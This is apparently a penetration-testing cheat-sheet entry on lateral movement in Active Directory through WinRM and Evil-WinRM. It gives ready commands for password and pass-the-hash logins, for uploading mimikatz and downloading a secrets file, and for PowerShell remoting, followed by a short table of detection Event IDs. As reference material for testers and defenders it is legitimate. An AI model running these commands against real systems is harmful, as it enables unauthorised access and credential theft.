attack-55-winrm-evil-winrm-lateral-movement.md (3033B)
1 --- 2 title: "Attack #55 — WinRM Evil-WinRM Lateral Movement" 3 description: "Windows Remote Management (WinRM) is a SOAP-based protocol for remote management over HTTP/HTTPS (ports 5985/5986). Evil-WinRM provides an interactive…" 4 category: active-directory 5 subcategory: "Lateral Movement" 6 tags: ["active-directory", "lateral-movement"] 7 tools: ["Mimikatz", "Evil-WinRM", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Seven/⚫ Attack #55 — WinRM Evil-WinRM Lateral Movement.md" 11 --- 12 # ⚫ Attack #55 — WinRM / Evil-WinRM Lateral Movement 13 14 *** 15 16 ## 📖 How It Works 17 18 Windows Remote Management (WinRM) is a SOAP-based protocol for remote management over HTTP/HTTPS (ports 5985/5986). Evil-WinRM provides an interactive PowerShell shell over WinRM with built-in file upload/download, DLL loading, and PowerShell script execution capabilities. Users must be in the **Remote Management Users** group or have admin rights. 19 20 *** 21 22 ## ⚙️ Prerequisites 23 24 | Requirement | Detail | 25 |---|---| 26 | **WinRM enabled on target** | Port 5985 (HTTP) or 5986 (HTTPS) | 27 | **Admin or Remote Management Users** | Required for WinRM access | 28 29 *** 30 31 ## 💻 Full Commands 32 33 ```bash 34 # ── Evil-WinRM with password ────────────────────────────────────────────────── 35 evil-winrm -i 10.10.10.10 -u Administrator -p 'Password1' 36 37 # ── PtH ─────────────────────────────────────────────────────────────────────── 38 evil-winrm -i 10.10.10.10 -u Administrator -H 2b576acbe6bcfda7294d6bd18041b8fe 39 40 # ── With scripts directory ──────────────────────────────────────────────────── 41 evil-winrm -i 10.10.10.10 -u Administrator -p 'Password1' -s /opt/tools/ 42 43 # ── Upload/Download inside session ──────────────────────────────────────────── 44 # upload /local/mimikatz.exe C:\Temp\mimikatz.exe 45 # download C:\Temp\secrets.txt /local/secrets.txt 46 ``` 47 48 ```powershell 49 # ── Native PowerShell remoting ──────────────────────────────────────────────── 50 Enter-PSSession -ComputerName TARGET -Credential CORP\Administrator 51 Invoke-Command -ComputerName TARGET -ScriptBlock { whoami } -Credential CORP\Administrator 52 ``` 53 54 *** 55 56 ## 🛡️ Detection — Event IDs 57 58 | Event ID | Source | What to Look For | 59 |---|---|---| 60 | **4624** | Security Log | Logon Type 3 via WinRM from unexpected source | 61 | **91** | Microsoft-Windows-WinRM/Operational | WinRM session created | 62 | **4688** | Security Log | wsmprovhost.exe spawning cmd/powershell | 63 64 *** 65 66 > ✅ **Attack #55 — WinRM complete.**